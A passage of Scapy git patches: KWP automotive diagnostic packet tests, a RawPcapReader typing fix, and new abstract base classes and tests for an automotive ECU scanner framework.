b'coffee' + += Check KWP_DDLIPR + +dddipr = KWP(b'\x6c\x12\x44\x01') +assert dddipr.service == 0x6c +assert dddipr.dynamicallyDefineLocalIdentifier == 0x12 + +assert dddipr.answers(dddi) + += Check KWP_WDBI + +wdbi = KWP(b'\x2e\x01\x02dieselgate') +assert wdbi.service == 0x2e +assert wdbi.identifier == 0x0102 +assert wdbi.load == b'dieselgate' + += Build KWP_WDBI + +wdbi = KWP()/KWP_WDBI(identifier=0x0102)/Raw(load=b'dieselgate') +assert wdbi.service == 0x2e +assert wdbi.identifier == 0x0102 +assert wdbi.load == b'dieselgate' +assert bytes(wdbi) == b'\x2e\x01\x02dieselgate' + += Check KWP_WDBI + +wdbi = KWP(b'\x2e\x01\x02dieselgate') +assert wdbi.service == 0x2e +assert wdbi.identifier == 0x0102 +assert wdbi.load == b'dieselgate' + +wdbi = KWP(b'\x2e\x02\x02benzingate') +assert wdbi.service == 0x2e +assert wdbi.identifier == 0x0202 +assert wdbi.load == b'benzingate' + + += Check KWP_WDBIPR + +wdbipr = KWP(b'\x6e\x02\x02') +assert wdbipr.service == 0x6e +assert wdbipr.identifier == 0x0202 + +assert wdbipr.answers(wdbi) + += Check KWP_WMBA + +wmba = KWP(b'\x3d\x11\x02\x02\x02muchData') +assert wmba.service == 0x3d +assert wmba.memoryAddress == 0x110202 +assert wmba.memorySize == 2 +assert wmba.dataRecord == b'muchData' + += Check KWP_WMBAPR + +wmbapr = KWP(b'\x7d\x11\x02\x02') +assert wmbapr.service == 0x7d +assert wmbapr.memoryAddress == 0x110202 + +assert wmbapr.answers(wmba) + += Check KWP_CDI + +cdtci = KWP(b'\x14\x44\x02\x03') +assert cdtci.service == 0x14 +assert cdtci.groupOfDTC == 0x4402 + +cdtcipr = KWP(b'\x54\x44\x02\x03') +assert cdtcipr.service == 0x54 +assert cdtcipr.groupOfDTC == 0x4402 + +assert cdtcipr.answers(cdtci) + += Check KWP_RC + +rc = KWP(b'\x31\xff\xee\xdd\xaa') +assert rc.service == 0x31 +assert rc.routineLocalIdentifier == 0xff +assert rc.load == b'\xee\xdd\xaa' + += Check KWP_RC + +rc = KWP(b'\x31\xff\xee\xdd\xaa') +assert rc.service == 0x31 +assert rc.routineLocalIdentifier == 0xff +assert rc.load == b'\xee\xdd\xaa' + + += Check KWP_RCPR + +rcpr = KWP(b'\x71\xff\xee\xdd\xaa') +assert rcpr.service == 0x71 +assert rcpr.routineLocalIdentifier == 0xff +assert rcpr.load == b'\xee\xdd\xaa' + +assert rcpr.answers(rc) + += Check KWP_RD + +rd = KWP(b'\x34\xaa\x11\x02\x02\x10\x00\x00') + +assert rd.service == 0x34 +assert rd.memoryAddress == 0xaa1102 +assert rd.compression == 0 +assert rd.encryption == 2 +assert rd.uncompressedMemorySize == 0x100000 + += Check KWP_RDPR + +rdpr = KWP(b'\x74\x02\x02\x02\x02\x03\x03\x03\x03') +assert rdpr.service == 0x74 +assert rdpr.maxNumberOfBlockLength == b'\x02\x02\x02\x02\x03\x03\x03\x03' +rdpr.show() +assert rdpr.answers(rd) + += Check KWP_RU + +ru = KWP(b'\x35\x11\x02\x02\xa0\xff\xff\xff') +assert ru.service == 0x35 +assert ru.memoryAddress == 0x110202 +assert ru.compression == 10 +assert ru.encryption == 0 +assert ru.uncompressedMemorySize == 0xffffff + += Check KWP_RUPR + +rupr = KWP(b'\x75\x02\x02\x02\x02\x03\x03\x03\x03') +assert rupr.service == 0x75 +assert rupr.maxNumberOfBlockLength == b'\x02\x02\x02\x02\x03\x03\x03\x03' + +assert rupr.answers(ru) + += Check KWP_TD + +td = KWP(b'\x36\xaapayload') +assert td.service == 0x36 +assert td.blockSequenceCounter == 0xaa +assert td.transferDataRequestParameter == b'payload' + += Check KWP_TDPR + +tdpr = KWP(b'\x76\xaapayload') +assert tdpr.service == 0x76 +assert tdpr.blockSequenceCounter == 0xaa +assert tdpr.transferDataRequestParameter == b'payload' + +assert tdpr.answers(td) + += Check KWP_RTE + +rte = KWP(b'\x37payload') +assert rte.service == 0x37 +assert rte.transferDataRequestParameter == b'payload' + += Check KWP_RTEPR + +rtepr = KWP(b'\x77payload') +assert rtepr.service == 0x77 +assert rtepr.transferDataRequestParameter == b'payload' + +assert rtepr.answers(rte) + += Check KWP_IOCBI + +iocbi = KWP(b'\x30\x23\xffcoffee') +assert iocbi.service == 0x30 +assert iocbi.localIdentifier == 0x23 +assert iocbi.inputOutputControlParameter == 255 +assert iocbi.controlState == b'coffee' + += Check KWP_IOCBIPR + +iocbipr = KWP(b'\x70\x23\xffcoffee') +assert iocbipr.service == 0x70 +assert iocbipr.localIdentifier == 0x23 +assert iocbipr.inputOutputControlParameter == 255 +assert iocbipr.controlState == b'coffee' + +assert iocbipr.answers(iocbi) + += Check KWP_NRC + +nrc = KWP(b'\x7f\x22\x33') +assert nrc.service == 0x7f +assert nrc.requestServiceId == 0x22 +assert nrc.negativeResponseCode == 0x33 From ff644181d9bee35979a84671690d8cd1aa1971fa Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 20 Apr 2021 13:47:16 +0200 Subject: [PATCH 0560/1632] Hotfix: fix bad typing --- scapy/utils.py | 2 +- test/regression.uts | 6 ++++++ 2 files changed, 7 insertions(+), 1 deletion(-) diff --git a/scapy/utils.py b/scapy/utils.py index 2e5efbbf964..0d42c0b9a9b 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1261,7 +1261,7 @@ def _read_packet(self, size=MTU): def read_packet(self, size=MTU): # type: (int) -> Packet return cast( - Packet, + "Packet", self._read_packet()[0] ) diff --git a/test/regression.uts b/test/regression.uts index 0a169e804a2..38644b7d759 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -2058,6 +2058,12 @@ assert r.linktype == DLT_EN10MB l = [ p for p in RawPcapReader(f) ] assert len(l) == 1 += Check RawPcapReader on pcap + +fd = get_temp_file() +wrpcap(fd, [Ether()/IP()/ICMP()]) +assert len([p for p in RawPcapReader(fd)]) == 1 + = Check tcpdump() ~ tcpdump from io import BytesIO From 693956de3da6d3703c338a3e88138846d9dd4f9f Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 22 Apr 2021 11:09:52 +0200 Subject: [PATCH 0561/1632] Add base classes of automotive scanners and enumerators (#3140) * Split #3054: Add base classes for a new and clean implementation of automotive scanners and enumerators --- .config/mypy/mypy_enabled.txt | 5 +- scapy/contrib/automotive/enumerator.py | 2 +- scapy/contrib/automotive/scanner/__init__.py | 7 + .../automotive/scanner/configuration.py | 88 +++++++ .../contrib/automotive/{ => scanner}/graph.py | 2 +- .../automotive/scanner/staged_test_case.py | 237 ++++++++++++++++++ scapy/contrib/automotive/scanner/test_case.py | 234 +++++++++++++++++ test/configs/bsd.utsc | 1 + test/configs/linux.utsc | 1 + test/configs/solaris.utsc | 1 + test/configs/windows.utsc | 1 + test/contrib/automotive/gm/gmlanutils.uts | 2 + .../automotive/scanner/configuration.uts | 130 ++++++++++ .../automotive/{ => scanner}/graph.uts | 2 +- .../automotive/scanner/staged_test_case.uts | 217 ++++++++++++++++ test/contrib/automotive/scanner/test_case.uts | 79 ++++++ 16 files changed, 1005 insertions(+), 4 deletions(-) create mode 100644 scapy/contrib/automotive/scanner/__init__.py create mode 100644 scapy/contrib/automotive/scanner/configuration.py rename scapy/contrib/automotive/{ => scanner}/graph.py (98%) create mode 100644 scapy/contrib/automotive/scanner/staged_test_case.py create mode 100644 scapy/contrib/automotive/scanner/test_case.py create mode 100644 test/contrib/automotive/scanner/configuration.uts rename test/contrib/automotive/{ => scanner}/graph.uts (96%) create mode 100644 test/contrib/automotive/scanner/staged_test_case.uts create mode 100644 test/contrib/automotive/scanner/test_case.uts diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index d02f3dadbae..3c6f7debe87 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -39,7 +39,10 @@ scapy/layers/l2.py # CONTRIB #scapy/contrib/http2.py # needs to be fixed scapy/contrib/roce.py -scapy/contrib/automotive/graph.py +scapy/contrib/automotive/scanner/test_case.py +scapy/contrib/automotive/scanner/staged_test_case.py +scapy/contrib/automotive/scanner/configuration.py +scapy/contrib/automotive/scanner/graph.py scapy/contrib/automotive/ecu.py scapy/contrib/automotive/uds_ecu_states.py scapy/contrib/automotive/uds_logging.py diff --git a/scapy/contrib/automotive/enumerator.py b/scapy/contrib/automotive/enumerator.py index 905952f86e2..c23f02e777d 100644 --- a/scapy/contrib/automotive/enumerator.py +++ b/scapy/contrib/automotive/enumerator.py @@ -12,7 +12,7 @@ from scapy.utils import make_lined_table, SingleConversationSocket import scapy.modules.six as six from scapy.contrib.automotive.ecu import EcuState -from scapy.contrib.automotive.graph import Graph +from scapy.contrib.automotive.scanner.graph import Graph class Enumerator(object): diff --git a/scapy/contrib/automotive/scanner/__init__.py b/scapy/contrib/automotive/scanner/__init__.py new file mode 100644 index 00000000000..c3a657f8abf --- /dev/null +++ b/scapy/contrib/automotive/scanner/__init__.py @@ -0,0 +1,7 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Nils Weiss +# This program is published under a GPLv2 license + +# scapy.contrib.description = Automotive Scanner Library +# scapy.contrib.status = skip diff --git a/scapy/contrib/automotive/scanner/configuration.py b/scapy/contrib/automotive/scanner/configuration.py new file mode 100644 index 00000000000..eebd2b71f24 --- /dev/null +++ b/scapy/contrib/automotive/scanner/configuration.py @@ -0,0 +1,88 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Nils Weiss +# This program is published under a GPLv2 license + +# scapy.contrib.description = AutomotiveTestCaseExecutorConfiguration +# scapy.contrib.status = library + +from scapy.compat import Any, Union, List, Type +from scapy.contrib.automotive.scanner.graph import Graph +from scapy.error import log_interactive +from scapy.contrib.automotive.scanner.test_case import AutomotiveTestCaseABC +from scapy.contrib.automotive.scanner.staged_test_case import StagedAutomotiveTestCase # noqa: E501 + + +class AutomotiveTestCaseExecutorConfiguration(object): + """ + Configuration storage for AutomotiveTestCaseExecutor. + + The following keywords are used in the AutomotiveTestCaseExecutor: + verbose: Enables verbose output and logging + debug: Will raise Exceptions on internal errors + delay_state_change: After a state change, a defined time is waited + + :param test_cases: List of AutomotiveTestCase classes or instances. + Classes will get instantiated in this initializer. + :param kwargs: Configuration for every AutomotiveTestCase in test_cases + and for the AutomotiveTestCaseExecutor. TestCase local + configuration and global configuration for all TestCase + objects are possible. All keyword arguments given will + be stored for every TestCase. To define a local + configuration for one TestCase only, the keyword + arguments need to be provided in a dictionary. + To assign a configuration dictionary to a TestCase, the + keyword need to identify the TestCase by the following + pattern. + ``MyTestCase_kwargs={"someConfig": 42}`` + The keyword is composed from the TestCase class name and + the postfix '_kwargs'. + + Example: + >>> config = AutomotiveTestCaseExecutorConfiguration([MyTestCase], global_config=42, MyTestCase_kwargs={"localConfig": 1337}) # noqa: E501 + """ + def __setitem__(self, key, value): + # type: (Any, Any) -> None + self.__dict__[key] = value + + def __getitem__(self, key): + # type: (Any) -> Any + return self.__dict__[key] + + def __init__(self, test_cases, **kwargs): + # type: (Union[List[Union[AutomotiveTestCaseABC, Type[AutomotiveTestCaseABC]]], List[Type[AutomotiveTestCaseABC]]], Any) -> None # noqa: E501 + self.verbose = kwargs.get("verbose", False) + self.debug = kwargs.get("debug", False) + self.delay_state_change = kwargs.get("delay_state_change", 0.5) + self.state_graph = Graph() + + # test_case can be a mix of classes or instances + self.test_cases = \ + [e() for e in test_cases if not isinstance(e, AutomotiveTestCaseABC)] # type: List[AutomotiveTestCaseABC] # noqa: E501 + self.test_cases += \ + [e for e in test_cases if isinstance(e, AutomotiveTestCaseABC)] + + self.stages = [e for e in self.test_cases + if isinstance(e, StagedAutomotiveTestCase)] + + self.staged_test_cases = \ + [i for sublist in [e.test_cases for e in self.stages] + for i in sublist] + + self.test_case_clss = set([ + case.__class__ for case in set(self.staged_test_cases + + self.test_cases)]) + + for cls in self.test_case_clss: + kwargs_name = cls.__name__ + "_kwargs" + self.__setattr__(cls.__name__, kwargs.pop(kwargs_name, dict())) + + for cls in self.test_case_clss: + val = self.__getattribute__(cls.__name__) + for kwargs_key, kwargs_val in kwargs.items(): + if kwargs_key not in val.keys(): + val[kwargs_key] = kwargs_val + self.__setattr__(cls.__name__, val) + + log_interactive.debug("The following configuration was created") + log_interactive.debug(self.__dict__) diff --git a/scapy/contrib/automotive/graph.py b/scapy/contrib/automotive/scanner/graph.py similarity index 98% rename from scapy/contrib/automotive/graph.py rename to scapy/contrib/automotive/scanner/graph.py index 3f6135027ae..7a74d553b1b 100644 --- a/scapy/contrib/automotive/graph.py +++ b/scapy/contrib/automotive/scanner/graph.py @@ -15,7 +15,7 @@ _Edge = Tuple[EcuState, EcuState] if TYPE_CHECKING: - from scapy.contrib.automotive.enumerator import _TransitionTuple + from scapy.contrib.automotive.scanner.test_case import _TransitionTuple class Graph(object): diff --git a/scapy/contrib/automotive/scanner/staged_test_case.py b/scapy/contrib/automotive/scanner/staged_test_case.py new file mode 100644 index 00000000000..6c0997733d0 --- /dev/null +++ b/scapy/contrib/automotive/scanner/staged_test_case.py @@ -0,0 +1,237 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Nils Weiss +# This program is published under a GPLv2 license + +# scapy.contrib.description = Staged AutomotiveTestCase base classes +# scapy.contrib.status = library + + +from scapy.compat import Any, List, Optional, Dict, Callable, cast, \ + TYPE_CHECKING +from scapy.contrib.automotive.scanner.graph import _Edge +from scapy.error import log_interactive +from scapy.contrib.automotive.ecu import EcuState, EcuResponse, Ecu +from scapy.contrib.automotive.scanner.test_case import AutomotiveTestCaseABC, \ + TestCaseGenerator, StateGenerator, _SocketUnion + + +if TYPE_CHECKING: + from scapy.contrib.automotive.scanner.test_case import _TransitionTuple + from scapy.contrib.automotive.scanner.configuration import \ + AutomotiveTestCaseExecutorConfiguration + + +# type definitions +_TestCaseConnectorCallable = Callable[[AutomotiveTestCaseABC, AutomotiveTestCaseABC], Dict[str, Any]] # noqa: E501 + + +class StagedAutomotiveTestCase(AutomotiveTestCaseABC, TestCaseGenerator, StateGenerator): # noqa: E501 + """ Helper object to build a pipeline of TestCases. This allows to combine + TestCases and to execute them after each other. Custom connector functions + can be used to exchange and manipulate the configuration of a subsequent + TestCase. + + :param test_cases: A list of objects following the AutomotiveTestCaseABC + interface + :param connectors: A list of connector functions. A connector function + takes two TestCase objects and returns a dictionary which is provided + to the second TestCase as kwargs of the execute function. + + + Example: + >>> class MyTestCase2(AutomotiveTestCaseABC): + >>> pass + >>> + >>> class MyTestCase1(AutomotiveTestCaseABC): + >>> pass + >>> + >>> def connector(testcase1, testcase2): + >>> scan_range = len(testcase1.results) + >>> return {"verbose": True, "scan_range": scan_range} + >>> + >>> tc1 = MyTestCase1() + >>> tc2 = MyTestCase2() + >>> pipeline = StagedAutomotiveTestCase([tc1, tc2], [None, connector]) + """ + + # Delay the increment of a stage after the current stage is finished + # has_completed() has to be called five times in order to increment the + # current stage. This ensures, that the current stage is executed for + # all possible states of the DUT, and no state is missed for the first + # TestCase. + __delay_stages = 5 + + def __init__(self, test_cases, connectors=None): + # type: (List[AutomotiveTestCaseABC], Optional[List[Optional[_TestCaseConnectorCallable]]]) -> None # noqa: E501 + super(StagedAutomotiveTestCase, self).__init__() + self.__test_cases = test_cases + self.__connectors = connectors + self.__stage_index = 0 + self.__completion_delay = 0 + self.__current_kwargs = None # type: Optional[Dict[str, Any]] + + def __getitem__(self, item): + # type: (int) -> AutomotiveTestCaseABC + return self.__test_cases[item] + + def __len__(self): + # type: () -> int + return len(self.__test_cases) + + @property + def test_cases(self): + # type: () -> List[AutomotiveTestCaseABC] + return self.__test_cases + + @property + def current_test_case(self): + # type: () -> AutomotiveTestCaseABC + return self[self.__stage_index] + + @property + def current_connector(self): + # type: () -> Optional[_TestCaseConnectorCallable] + if not self.__connectors: + return None + else: + return self.__connectors[self.__stage_index] + + @property + def previous_test_case(self): + # type: () -> Optional[AutomotiveTestCaseABC] + return self.__test_cases[self.__stage_index - 1] if \ + self.__stage_index > 0 else None + + def get_generated_test_case(self): + # type: () -> Optional[AutomotiveTestCaseABC] + try: + test_case = cast(TestCaseGenerator, self.current_test_case) + return test_case.get_generated_test_case() + except AttributeError: + return None + + def get_new_edge(self, socket, config): + # type: (_SocketUnion, AutomotiveTestCaseExecutorConfiguration) -> Optional[_Edge] # noqa: E501 + try: + test_case = cast(StateGenerator, self.current_test_case) + return test_case.get_new_edge(socket, config) + except AttributeError: + return None + + def get_transition_function(self, socket, edge): + # type: (_SocketUnion, _Edge) -> Optional[_TransitionTuple] + try: + test_case = cast(StateGenerator, self.current_test_case) + return test_case.get_transition_function(socket, edge) + except AttributeError: + return None + + def has_completed(self, state): + # type: (EcuState) -> bool + if not (self.current_test_case.has_completed(state) and + self.current_test_case.completed): + # current test_case not fully completed + # reset completion delay, since new states could have been appeared + self.__completion_delay = 0 + return False + + # current stage is finished. We have to increase the stage + if self.__completion_delay < StagedAutomotiveTestCase.__delay_stages: + # First we wait five more iteration of the executor + # Maybe one more execution reveals new states of other + # test_cases + self.__completion_delay += 1 + return False + + # current test_case is fully completed + elif self.__stage_index == len(self.__test_cases) - 1: + # this test_case was the last test_case... nothing to do + return True + + else: + # We waited more iterations and no new state appeared, + # let's enter the next stage + log_interactive.info( + "[+] Staged AutomotiveTestCase %s completed", + self.current_test_case.__class__.__name__) + self.__stage_index += 1 + self.__completion_delay = 0 + return False + + def pre_execute(self, socket, state, global_configuration): + # type: (_SocketUnion, EcuState, AutomotiveTestCaseExecutorConfiguration) -> None # noqa: E501 + test_case_cls = self.current_test_case.__class__ + try: + self.__current_kwargs = global_configuration[ + test_case_cls.__name__] + except KeyError: + self.__current_kwargs = dict() + global_configuration[test_case_cls.__name__] = \ + self.__current_kwargs + + if callable(self.current_connector) and self.__stage_index > 0: + if self.previous_test_case: + con = self.current_connector # type: _TestCaseConnectorCallable # noqa: E501 + con_kwargs = con(self.previous_test_case, + self.current_test_case) + if self.__current_kwargs is not None and con_kwargs is not None: # noqa: E501 + self.__current_kwargs.update(con_kwargs) + + log_interactive.debug("[i] Stage AutomotiveTestCase %s kwargs: %s", + self.current_test_case.__class__.__name__, + self.__current_kwargs) + + self.current_test_case.pre_execute(socket, state, global_configuration) + + def execute(self, socket, state, **kwargs): + # type: (_SocketUnion, EcuState, Any) -> None # noqa: E501 + kwargs = self.__current_kwargs or dict() + self.current_test_case.execute(socket, state, **kwargs) + + def post_execute(self, socket, state, global_configuration): + # type: (_SocketUnion, EcuState, AutomotiveTestCaseExecutorConfiguration) -> None # noqa: E501 + self.current_test_case.post_execute(socket, state, global_configuration) # noqa: E501 + + @staticmethod + def _show_headline(headline, sep="=", dump=False): + # type: (str, str, bool) -> Optional[str] + s = "\n\n" + sep * (len(headline) + 10) + "\n" + s += " " * 5 + headline + "\n" + s += sep * (len(headline) + 10) + "\n" + + if dump: + return s + "\n" + else: + print(s) + return None + + def show(self, dump=False, filtered=True, verbose=False): + # type: (bool, bool, bool) -> Optional[str] + s = self._show_headline("AutomotiveTestCase Pipeline", "=", dump) or "" + for idx, t in enumerate(self.__test_cases): + s += self._show_headline( + "AutomotiveTestCase Stage %d" % idx, "-", dump) or "" + s += t.show(dump, filtered, verbose) or "" + + if dump: + return s + "\n" + else: + print(s) + return None + + @property + def completed(self): + # type: () -> bool + return all(e.completed for e in self.__test_cases) and \ + self.__completion_delay >= StagedAutomotiveTestCase.__delay_stages + + @property + def supported_responses(self): + # type: () -> List[EcuResponse] + supported_responses = list() + for tc in self.test_cases: + supported_responses += tc.supported_responses + + supported_responses.sort(key=Ecu.sort_key_func) + return supported_responses diff --git a/scapy/contrib/automotive/scanner/test_case.py b/scapy/contrib/automotive/scanner/test_case.py new file mode 100644 index 00000000000..8e4943d11af --- /dev/null +++ b/scapy/contrib/automotive/scanner/test_case.py @@ -0,0 +1,234 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Nils Weiss +# This program is published under a GPLv2 license + +# scapy.contrib.description = TestCase base class definitions +# scapy.contrib.status = library + + +import abc +from collections import defaultdict + +from scapy.compat import Any, Union, List, Optional, \ + Dict, Tuple, Set, Callable, TYPE_CHECKING +from scapy.utils import make_lined_table, SingleConversationSocket +import scapy.modules.six as six +from scapy.supersocket import SuperSocket +from scapy.contrib.automotive.scanner.graph import _Edge +from scapy.contrib.automotive.ecu import EcuState, EcuResponse + + +if TYPE_CHECKING: + from scapy.contrib.automotive.scanner.configuration import AutomotiveTestCaseExecutorConfiguration # noqa: E501 + + +# type definitions +_SocketUnion = Union[SuperSocket, SingleConversationSocket] +_TransitionCallable = Callable[[_SocketUnion, "AutomotiveTestCaseExecutorConfiguration", Dict[str, Any]], bool] # noqa: E501 +_CleanupCallable = Callable[[_SocketUnion, "AutomotiveTestCaseExecutorConfiguration"], bool] # noqa: E501 +_TransitionTuple = Tuple[_TransitionCallable, Dict[str, Any], Optional[_CleanupCallable]] # noqa: E501 + + +@six.add_metaclass(abc.ABCMeta) +class AutomotiveTestCaseABC(): + """ + Base class for "TestCase" objects. In automotive scanners, these TestCase + objects are used for individual tasks, for example enumerating over one + kind of functionality of the protocol. It is also possible, that + these TestCase objects execute complex tests on an ECU. + The TestCaseExecuter object has a list of TestCases. The executer + manipulates a device under test (DUT), to enter a certain state. In this + state, the TestCase object gets executed. + """ + @abc.abstractmethod + def has_completed(self, state): + # type: (EcuState) -> bool + """ + Tells if this TestCase was executed for a certain state + :param state: State of interest + :return: True, if TestCase was executed in the questioned state + """ + raise NotImplementedError() + + @abc.abstractmethod + def pre_execute(self, socket, state, global_configuration): + # type: (_SocketUnion, EcuState, AutomotiveTestCaseExecutorConfiguration) -> None # noqa: E501 + """ + Will be executed previously to ``execute``. This function can be used + to manipulate the configuration passed to execute. + + :param socket: Socket object with the connection to a DUT + :param state: Current state of the DUT + :param global_configuration: Configuration of the TestCaseExecutor + """ + raise NotImplementedError() + + @abc.abstractmethod + def execute(self, socket, state, **kwargs): + # type: (_SocketUnion, EcuState, Any) -> None + """ + Executes this TestCase for a given state + + :param socket: Socket object with the connection to a DUT + :param state: Current state of the DUT + :param kwargs: Local configuration of the TestCasesExecutor + :return: + """ + raise NotImplementedError() + + @abc.abstractmethod + def post_execute(self, socket, state, global_configuration): + # type: (_SocketUnion, EcuState, AutomotiveTestCaseExecutorConfiguration) -> None # noqa: E501 + """ + Will be executed subsequently to ``execute``. This function can be used + for additional evaluations after the ``execute``. + + :param socket: Socket object with the connection to a DUT + :param state: Current state of the DUT + :param global_configuration: Configuration of the TestCaseExecutor + """ + raise NotImplementedError() + + @abc.abstractmethod + def show(self, dump=False, filtered=True, verbose=False): + # type: (bool, bool, bool) -> Optional[str] + """ + Shows results of TestCase + + :param dump: If True, the results will be returned; If False, the + results will be printed. + :param filtered: If True, the negative responses will be filtered + dynamically. + :param verbose: If True, additional information will be provided. + :return: test results of TestCase if parameter ``dump`` is True, + else ``None`` + """ + raise NotImplementedError() + + @property + @abc.abstractmethod + def completed(self): + # type: () -> bool + """ + Tells if this TestCase is completely executed + :return: True, if TestCase is completely executed + """ + raise NotImplementedError + + @property + @abc.abstractmethod + def supported_responses(self): + # type: () -> List[EcuResponse] + """ + Tells the supported responses in TestCase + :return: The list of supported responses + """ + raise NotImplementedError + + +class AutomotiveTestCase(AutomotiveTestCaseABC): + """ Base class for TestCases""" + + _description = "AutomotiveTestCase" + + def __init__(self): + # type: () -> None + self._state_completed = defaultdict(bool) # type: Dict[EcuState, bool] + + def has_completed(self, state): + # type: (EcuState) -> bool + return self._state_completed[state] + + @property + def completed(self): + # type: () -> bool + return all(v for _, v in self._state_completed.items()) + + @property + def scanned_states(self): + # type: () -> Set[EcuState] + """ + Helper function to get all scanned states + :return: all scanned states + """ + return set(self._state_completed.keys()) + + def pre_execute(self, socket, state, global_configuration): + # type: (_SocketUnion, EcuState, AutomotiveTestCaseExecutorConfiguration) -> None # noqa: E501 + pass + + def execute(self, socket, state, **kwargs): + # type: (_SocketUnion, EcuState, Any) -> None + raise NotImplementedError() + + def post_execute(self, socket, state, global_configuration): + # type: (_SocketUnion, EcuState, AutomotiveTestCaseExecutorConfiguration) -> None # noqa: E501 + pass + + def _show_header(self, dump=False): + # type: (bool) -> Optional[str] + s = "\n\n" + "=" * (len(self._description) + 10) + "\n" + s += " " * 5 + self._description + "\n" + s += "-" * (len(self._description) + 10) + "\n" + + if dump: + return s + "\n" + else: + print(s) + return None + + def _show_state_information(self, dump): + # type: (bool) -> Optional[str] + completed = [(state, self._state_completed[state]) + for state in self.scanned_states] + return make_lined_table( + completed, lambda tup: ("Scan state completed", tup[0], tup[1]), + dump=dump) + + def show(self, dump=False, filtered=True, verbose=False): + # type: (bool, bool, bool) -> Optional[str] + + s = self._show_header(dump) or "" + + if verbose: + s += self._show_state_information(dump) or "" + + if dump: + return s + "\n" + else: + print(s) + return None + + +@six.add_metaclass(abc.ABCMeta) +class TestCaseGenerator(): + @abc.abstractmethod + def get_generated_test_case(self): + # type: () -> Optional[AutomotiveTestCaseABC] + raise NotImplementedError() + + +@six.add_metaclass(abc.ABCMeta) +class StateGenerator(): + + @abc.abstractmethod + def get_new_edge(self, socket, config): + # type: (_SocketUnion, AutomotiveTestCaseExecutorConfiguration) -> Optional[_Edge] # noqa: E501 + raise NotImplementedError + + @abc.abstractmethod + def get_transition_function(self, socket, edge): + # type: (_SocketUnion, _Edge) -> Optional[_TransitionTuple] + """ + + :param socket: Socket to target + :param edge: Tuple of EcuState objects for the requested + transition function + :return: Returns an optional tuple with two functions. Both functions + take a Socket and the TestCaseExecutor configuration as + arguments and return True if the execution was successful. + The first function is the state enter function, the second + function is a cleanup function + """ + raise NotImplementedError diff --git a/test/configs/bsd.utsc b/test/configs/bsd.utsc index 09566be1a59..705d10c0b47 100644 --- a/test/configs/bsd.utsc +++ b/test/configs/bsd.utsc @@ -4,6 +4,7 @@ "test/scapy/layers/*.uts", "test/contrib/automotive/*.uts", "test/contrib/automotive/obd/*.uts", + "test/contrib/automotive/scanner/*.uts", "test/contrib/automotive/gm/*.uts", "test/contrib/automotive/bmw/*.uts", "test/contrib/automotive/xcp/*.uts", diff --git a/test/configs/linux.utsc b/test/configs/linux.utsc index 3bf3d23c3fc..aee9a9fa522 100644 --- a/test/configs/linux.utsc +++ b/test/configs/linux.utsc @@ -6,6 +6,7 @@ "test/tools/*.uts", "test/contrib/automotive/*.uts", "test/contrib/automotive/obd/*.uts", + "test/contrib/automotive/scanner/*.uts", "test/contrib/automotive/gm/*.uts", "test/contrib/automotive/bmw/*.uts", "test/contrib/automotive/xcp/*.uts", diff --git a/test/configs/solaris.utsc b/test/configs/solaris.utsc index dc07a27ebaa..ada75031993 100644 --- a/test/configs/solaris.utsc +++ b/test/configs/solaris.utsc @@ -4,6 +4,7 @@ "test/scapy/layers/*.uts", "test/contrib/automotive/*.uts", "test/contrib/automotive/obd/*.uts", + "test/contrib/automotive/scanner/*.uts", "test/contrib/automotive/gm/*.uts", "test/contrib/automotive/bmw/*.uts", "test/contrib/automotive/xcp/*.uts", diff --git a/test/configs/windows.utsc b/test/configs/windows.utsc index a37ab5873e2..9b29faeafb5 100644 --- a/test/configs/windows.utsc +++ b/test/configs/windows.utsc @@ -4,6 +4,7 @@ "test\\scapy\\layers\\*.uts", "test\\tls\\tests_tls_netaccess.uts", "test\\contrib\\automotive\\obd\\*.uts", + "test\\contrib\\automotive\\scanner\\*.uts", "test\\contrib\\automotive\\gm\\*.uts", "test\\contrib\\automotive\\bmw\\*.uts", "test\\contrib\\automotive\\xcp\\*.uts", diff --git a/test/contrib/automotive/gm/gmlanutils.uts b/test/contrib/automotive/gm/gmlanutils.uts index ac3195468c6..4f84ee6962a 100644 --- a/test/contrib/automotive/gm/gmlanutils.uts +++ b/test/contrib/automotive/gm/gmlanutils.uts @@ -1,6 +1,8 @@ % Regression tests for gmlanutil ~ needs_root +~ not_pypy needs_root + + Configuration ~ conf diff --git a/test/contrib/automotive/scanner/configuration.uts b/test/contrib/automotive/scanner/configuration.uts new file mode 100644 index 00000000000..4ee959d09be --- /dev/null +++ b/test/contrib/automotive/scanner/configuration.uts @@ -0,0 +1,130 @@ +% Regression tests for automotive scanner configuration + ++ Load general modules + += Load contribution layer + +from scapy.contrib.automotive.scanner.test_case import AutomotiveTestCase +from scapy.contrib.automotive.scanner.configuration import AutomotiveTestCaseExecutorConfiguration +from scapy.contrib.automotive.scanner.staged_test_case import StagedAutomotiveTestCase + ++ Basic checks + += Definition of Test classes + +class MyTestCase1(AutomotiveTestCase): + _description = "MyTestCase1" + def supported_responses(self): + return [] + + +class MyTestCase2(AutomotiveTestCase): + _description = "MyTestCase2" + def supported_responses(self): + return [] + +class MyTestCase3(AutomotiveTestCase): + _description = "MyTestCase3" + def supported_responses(self): + return [] + +class MyTestCase4(AutomotiveTestCase): + _description = "MyTestCase4" + def supported_responses(self): + return [] + += creation of config with classes + +config = AutomotiveTestCaseExecutorConfiguration( + [MyTestCase1, MyTestCase2, MyTestCase3, MyTestCase4]) + +assert len(config.test_cases) == 4 +assert len(config.test_case_clss) == 4 +assert len(config.stages) == 0 +assert len(config.staged_test_cases) == 0 +assert config.verbose == False +assert config.debug == False +assert config.delay_state_change > 0 + + += creation of config with instances + +config = AutomotiveTestCaseExecutorConfiguration( + [MyTestCase1(), MyTestCase2(), MyTestCase3(), MyTestCase4()]) + +assert len(config.test_cases) == 4 +assert len(config.test_case_clss) == 4 +assert len(config.stages) == 0 +assert len(config.staged_test_cases) == 0 +assert config.verbose == False +assert config.debug 